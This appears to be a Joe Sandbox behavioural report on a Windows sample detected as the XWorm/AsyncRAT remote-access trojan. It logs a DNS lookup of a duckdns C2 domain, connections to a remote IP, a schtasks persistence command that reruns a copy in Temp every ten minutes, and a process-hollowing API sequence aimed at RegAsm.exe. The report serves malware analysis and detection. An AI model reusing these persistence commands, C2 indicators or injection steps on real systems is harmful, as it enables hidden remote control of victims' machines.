                                        Apr 21, 2024 23:27:02.685039043 CEST88964973057.128.155.22192.168.2.4
                                        Apr 21, 2024 23:27:02.686117887 CEST497308896192.168.2.457.128.155.22
                                        Apr 21, 2024 23:27:02.928292036 CEST88964973057.128.155.22192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 21, 2024 23:23:03.227469921 CEST | 49227 | 53 | 192.168.2.4 | 1.1.1.1
Apr 21, 2024 23:23:03.366585016 CEST | 53 | 49227 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 21, 2024 23:23:03.227469921 CEST | 192.168.2.4 | 1.1.1.1 | 0xe624 | Standard query (0) | vbdsg.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 21, 2024 23:23:03.366585016 CEST | 1.1.1.1 | 192.168.2.4 | 0xe624 | No error (0) | vbdsg.duckdns.org | (none) | 57.128.155.22 | A (IP address) | IN (0x0001) | false

                                        Target ID:0
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Users\user\Desktop\fresh_shrunk.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\fresh_shrunk.exe"
                                        Imagebase:0x5b0000
                                        File size:167'936 bytes
                                        MD5 hash:745A24A4347A0BB2B9C5E1BA5B2DADEB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0x9d0000
                                        File size:65'440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Target ID:2
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:23:22:54
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0xc70000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:23:22:55
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:23:22:55
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
                                        Imagebase:0xb20000
                                        File size:167'936 bytes
                                        MD5 hash:745A24A4347A0BB2B9C5E1BA5B2DADEB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 55%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:10
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                        Imagebase:0xcd0000
                                        File size:65'440 bytes
                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx"
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:13
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:15
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f
                                        Imagebase:0xc70000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
                                        Imagebase:0x7ff7699e0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:23:22:56
                                        Start date:21/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:16.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:4.7%
                                          Total number of Nodes:64
                                          Total number of Limit Nodes:4
                                          execution_graph (rendered graph omitted): root node 2710848; API calls reached from it, in graph order: CreateProcessAsUserA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, Wow64GetThreadContext, Wow64SetThreadContext, ResumeThread

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 2718030-27180cc; calls CreateProcessAsUserA and subroutine 2715f98
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0271826A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 8b25330ca10ae9294245170b6e0483f7e0e131f67ee65ce449e6b648161d0179
                                          • Instruction ID: 7f6af540e8e08f4894cf674f8152a2123a16e2c9ebfb01f08db8040dc541601c
                                          • Opcode Fuzzy Hash: 8b25330ca10ae9294245170b6e0483f7e0e131f67ee65ce449e6b648161d0179
                                          • Instruction Fuzzy Hash: C8912971D00619CFEB25DF69C941BEEBBB2FF48304F0481A9E818A7250DB759985CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58753553344a19c24875972d84a4176f44d579e592e5c377861f174195543ef1
                                          • Instruction ID: 8d60b809a71d5c5a817b95064a0c69573671dd1afda47936fabcef53a0840181
                                          • Opcode Fuzzy Hash: 58753553344a19c24875972d84a4176f44d579e592e5c377861f174195543ef1
                                          • Instruction Fuzzy Hash: 7FB13CB1E00209CFDB19CFADD9857AEBBF2AF88314F548129D815A7294EB749845CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23e925da8a5d8b0b6e85f53dbfaa48b41e2912326525aad320418b235b538df1
                                          • Instruction ID: 8cce17dae492843e36a618cb578321bb7f6955fe8ce7362e65746fd3c390395b
                                          • Opcode Fuzzy Hash: 23e925da8a5d8b0b6e85f53dbfaa48b41e2912326525aad320418b235b538df1
                                          • Instruction Fuzzy Hash: 6FB14DB0E0020ACFDB28CFADD98579DBBF2BF88314F549529D415EB294EB749845CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 2718025-27180cc; calls CreateProcessAsUserA and subroutine 2715f98
                                          APIs
                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0271826A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: c6d7c13f9d2e102fccd2b77287344559c1bafab286c7842211843e1f70483188
                                          • Instruction ID: 505c618d21e1dd6ceb9d4adb9b636967dcbb3440868e3d5ff3b0015c8bc400e0
                                          • Opcode Fuzzy Hash: c6d7c13f9d2e102fccd2b77287344559c1bafab286c7842211843e1f70483188
                                          • Instruction Fuzzy Hash: 8F912A71D00619CFEB25DF69C941BEEBBB2FF48304F0481A9E818A7250DB759985CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 2718658-27186b1; calls WriteProcessMemory
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027186ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 03ba8f96dd14a20238c56c5f55f053d20ef93618b82072ee20faf52fd21f9e8f
                                          • Instruction ID: b771841f61ae1eed2f08baecbdaf1ae8a585d428568101bd66a83a9c30cb21dc
                                          • Opcode Fuzzy Hash: 03ba8f96dd14a20238c56c5f55f053d20ef93618b82072ee20faf52fd21f9e8f
                                          • Instruction Fuzzy Hash: 022122B19003499FDB10CFAAC985BDEBBF4FF48314F10842AE958A3251D378A954CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 2718660-27186b1; calls WriteProcessMemory
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027186ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 50d8a365a89649cb60b0ca62c16fa34f99613dbcf53fd0ef0cec0e9193e81b8e
                                          • Instruction ID: fece41f0563ada58ae80558c58a3b8792ac8193648c0400240cf958586c03572
                                          • Opcode Fuzzy Hash: 50d8a365a89649cb60b0ca62c16fa34f99613dbcf53fd0ef0cec0e9193e81b8e
                                          • Instruction Fuzzy Hash: 6321E2B5910349DFDB10CF9AC985BDEBBF4FF48314F10842AE918A3251D378A954CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 27187c0-2718814; calls Wow64SetThreadContext
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 02718842
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: c5bbe48d6c3a0f95b579c85de024acd6bb4d6dce2a6b447db02287da703d79cf
                                          • Instruction ID: 0cbbb778a3dcc1822676cf37b61127ae6692f27404ed6e0f2f0ee7a20e80d37d
                                          • Opcode Fuzzy Hash: c5bbe48d6c3a0f95b579c85de024acd6bb4d6dce2a6b447db02287da703d79cf
                                          • Instruction Fuzzy Hash: 932115B2D102599FDB10CF9AC985BDEFBF4EB48314F14812AD518A7240D378A954CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 2718400-2718454; calls Wow64GetThreadContext
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0271847F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9caa05a96bdb3033a2e10bab2542db84fff3ded8709d7f9243b54f23e39b89a9
                                          • Instruction ID: 3229a7f135821fd98e4d35fc4538511580654fc0826657ee3099ab97c7cf221f
                                          • Opcode Fuzzy Hash: 9caa05a96bdb3033a2e10bab2542db84fff3ded8709d7f9243b54f23e39b89a9
                                          • Instruction Fuzzy Hash: 862118B1D002599FDB10CFAAC545BEEFBF4FB48324F14816AD418A3240D7749944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 27187c8-2718814; calls Wow64SetThreadContext
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?), ref: 02718842
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: b1ba89643574609fbd6b3a42174d136eb8abd4fdc62dfdd0b3e7d1bc870f81bd
                                          • Instruction ID: e33d41f6fe35612f58e219ea926da2871777c9aded3c44283fc8692aac68dbfa
                                          • Opcode Fuzzy Hash: b1ba89643574609fbd6b3a42174d136eb8abd4fdc62dfdd0b3e7d1bc870f81bd
                                          • Instruction Fuzzy Hash: DF21E5B1D102599FDB10CF9AC985B9EFBF4AB48314F14812AD518A3640D378A954CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 27184c0-271854b; calls ReadProcessMemory
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0271853E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: bc98f7626cfe5ffa8fef5c8f93795230e6d5e2793147f855c588224ae66b9d63
                                          • Instruction ID: 51ec4faf053e96bbfbd83c7bbacafbcee18121849f02067e7c0e9fa24597b4ed
                                          • Opcode Fuzzy Hash: bc98f7626cfe5ffa8fef5c8f93795230e6d5e2793147f855c588224ae66b9d63
                                          • Instruction Fuzzy Hash: 962124B19002499FDB10CF9AC885ADEBBF5FF48324F14802AE918A3250D379A644CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 2718408-2718454; calls Wow64GetThreadContext
                                          APIs
                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0271847F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 4ffa39c03ad8b2eac5d7074f5b01e8e36ab14f659828bdc04a3a04f1dd68555c
                                          • Instruction ID: 831ed4275d086f7855824c15a2be7d7f852366f56c1290dfeca0345a6ac3ec9b
                                          • Opcode Fuzzy Hash: 4ffa39c03ad8b2eac5d7074f5b01e8e36ab14f659828bdc04a3a04f1dd68555c
                                          • Instruction Fuzzy Hash: FC21F7B1D106199FDB10CF9AC945B9EFBF4BB48314F14816AD918A3240D778A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 27184c8-271854b; calls ReadProcessMemory
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0271853E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 3399c0f3c1cf71c4bfd5a397c3e5162f9780aac83ad66e61d8b7decc64abd59f
                                          • Instruction ID: 0345f9aba69a1a6fc77bd8cf47b2c4a79723c3d19fdc6537db6d446c62349502
                                          • Opcode Fuzzy Hash: 3399c0f3c1cf71c4bfd5a397c3e5162f9780aac83ad66e61d8b7decc64abd59f
                                          • Instruction Fuzzy Hash: 9021F4B59002499FDB10CF9AC984ADEBBF5EF48324F148429E918A3250D379A544DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph (rendered graph omitted): function entry block 27185b1-2718630; calls VirtualAllocEx
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02718623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 7cc871a531e24240f80a1f92995f00c10fc0baeed3c1f920a0307a7debc59c59
                                          • Instruction ID: 30484c5e7bef81e324688eda0eda2acb2b300ae7cf8484151bb196cb28d64768
                                          • Opcode Fuzzy Hash: 7cc871a531e24240f80a1f92995f00c10fc0baeed3c1f920a0307a7debc59c59
                                          • Instruction Fuzzy Hash: E21102B59002499FCB20DF9AD985ADEBFF4EF88324F208459E918A7250C375A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02718623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: ba3b8813c61f3988184093fd214676b47b5f9cc394a0f01bb94bcb9e2c112c5c
                                          • Instruction ID: ff3d0e12b22c78f045b45d0c5928449d9ac532edbbd4bd25ae41e6eeaf85bf51
                                          • Opcode Fuzzy Hash: ba3b8813c61f3988184093fd214676b47b5f9cc394a0f01bb94bcb9e2c112c5c
                                          • Instruction Fuzzy Hash: 9E1113B5900249DFCB20CF9AC984BDEBFF8EF48324F208459E518A7250C375A544CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 0dae61944ab55be17f6e235d931fd35d4fd44a4e7fc61bfbd78adf51ba90e142
                                          • Instruction ID: 26143b571ce13fa6277b0bf601775b1e15c3b9266f6dfb7b86a931008cc7c574
                                          • Opcode Fuzzy Hash: 0dae61944ab55be17f6e235d931fd35d4fd44a4e7fc61bfbd78adf51ba90e142
                                          • Instruction Fuzzy Hash: EB1125B1D002498FCB20CF9AC585B9EBFF8EB48324F20845AD518B7240D3756944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677451486.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2710000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 7d2d24cc556d414f7fd800b6d7ec79fab29e9cc923be43a33b90e9a4b5dea77e
                                          • Instruction ID: 666371998f9fdcd6d942dd4a038b403806a40cc2fc272e8043bb1c0731065552
                                          • Opcode Fuzzy Hash: 7d2d24cc556d414f7fd800b6d7ec79fab29e9cc923be43a33b90e9a4b5dea77e
                                          • Instruction Fuzzy Hash: 621103B59003498FDB20DF9AC985B9EBBF8EB88324F208459D518A7240C375A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1677520842.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2740000_fresh_shrunk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
